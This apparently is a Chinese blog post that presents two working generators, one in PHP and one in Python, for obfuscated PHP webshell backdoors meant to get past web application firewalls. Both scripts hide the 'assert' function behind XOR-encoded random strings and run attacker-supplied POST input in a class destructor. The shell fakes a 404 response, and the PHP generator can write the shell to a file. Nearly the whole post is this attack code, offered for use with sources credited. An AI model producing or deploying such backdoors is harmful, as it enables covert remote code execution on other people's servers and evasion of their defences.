A-A+
php异或 python异或 生成绕waf的后门
注意这里利用了 同一变量与另一变量和其异或值异或等于另一个数,如(a^b)^b=a。
首先是PHP的:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 | <?php //code by Mr6 error_reporting(0); function randomkeys($length) { $pattern = '`~-=!@#$%^&*_/+?<>{}|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'; for($i=0;$i<$length;$i++) { $key[$i]= $pattern{mt_rand(0,strlen($pattern)-1)}; //生成php随机数 } return $key; } function randname($length) { $pattern = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'; for($i=0;$i<$length;$i++) { @$key.= $pattern{mt_rand(0,strlen($pattern)-1)}; //生成php随机数 } return $key; } $str=randomkeys(6); $bname=randname(4); $lname=strrev(strtolower($bname)); $str2="assert"; echo "<?php \n"; echo "header('HTTP/1.1 404');\n"; echo "class ".$bname."{ public \$c='';\nfunction __destruct(){\n"; for ($i=0;$i<6;$i++) { $name="_".$i; $str3[$i]=bin2hex($str[$i] ^$str2[$i]); echo "$"."$name="; echo "'".$str[$i]."'"."^"."\"\\x".$str3[$i]."\";\n"; } $aa='$db=$_0.$_1.$_2.$_3.$_4.$_5;'; echo $aa; echo "\n"; echo '@$db ("$this->c");}}'; echo "\n"; echo "\${$lname}=new {$bname}();\n"; echo "@\${$lname}->c=\$_POST['Mr6'];\n"; echo "?>\n"; @$file=$_GET['file']; $html = ob_get_contents(); if (isset($file)) { if(file_put_contents($file,$html)) echo "\n\n\n".$file." save success!";} else {echo "Please input the file name like '?file=xxx.txt'";} ?> |
数据来源:https://github.com/yzddmr6/php_xor_bypass/blob/master/xor_2.0.php
然后是python3的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 | # coding=utf-8 import random func = 'assert' shell = '''<?php header('HTTP/1.1 404'); class {0}{2} ${1}=new {0}(); @${1}->c=$_POST['Mr6']; ?>''' def random_keys(len): str = '`~-=!@#$%^&*_/+?<>{}|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' return ''.join(random.sample(str, len)) def random_name(len): str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' return ''.join(random.sample(str, len)) def xor(c1, c2): n1 = ord(c1) n2 = ord(c2) n3 = n1 ^ n2 return chr(n3) def build_func(): func_line = '' key = random_keys(len(func)) #取func函数长度(6个)的随机字符 call = '$db=' for i in range(0, len(func)): enc = xor(func[i], key[i]) """这里解释一下enc.encode("utf-8").hex()因为它的结果会是十六进制,php在十六进制前面加入 \\x \\x 开头表示转义字符,后面的数字是字符的ascii码的十六进制形式 该字符表示ASCII码十六进制是13(10进制为19)的字符,为不可见字符""" func_line += "$_{:d}='{}'^\"\\x{}\";".format(i, key[i], enc.encode("utf-8").hex()) #这里相当利用异或从新形成func的值 func_line += '\n' call += '$_{:d}.'.format(i) #累计把call的值 $db累加上面从新计算的func的值 func_line = func_line.rstrip('\n') call = call.rstrip('.') + ';' #rstrip() 删除 string 字符串末尾的指定字符(默认为空格). func_tmpl = '''{ public $c=''; function __destruct(){ %s %s @$db ("$this->c");}}''' % (func_line, call) return func_tmpl def build_webshell(): className = random_name(4) #随机取4个字符 objName = className.lower() #把上面随机取的四个字符变为小写。 func = build_func() shellc = shell.format(className, objName, func) #把上面组合好的做一个完整的拼接 return shellc if __name__ == '__main__': print(build_webshell()) |
只是做了轻微改动,数据来源:https://www.t00ls.net/thread-51338-1-1.html
布施恩德可便相知重
微信扫一扫打赏
支付宝扫一扫打赏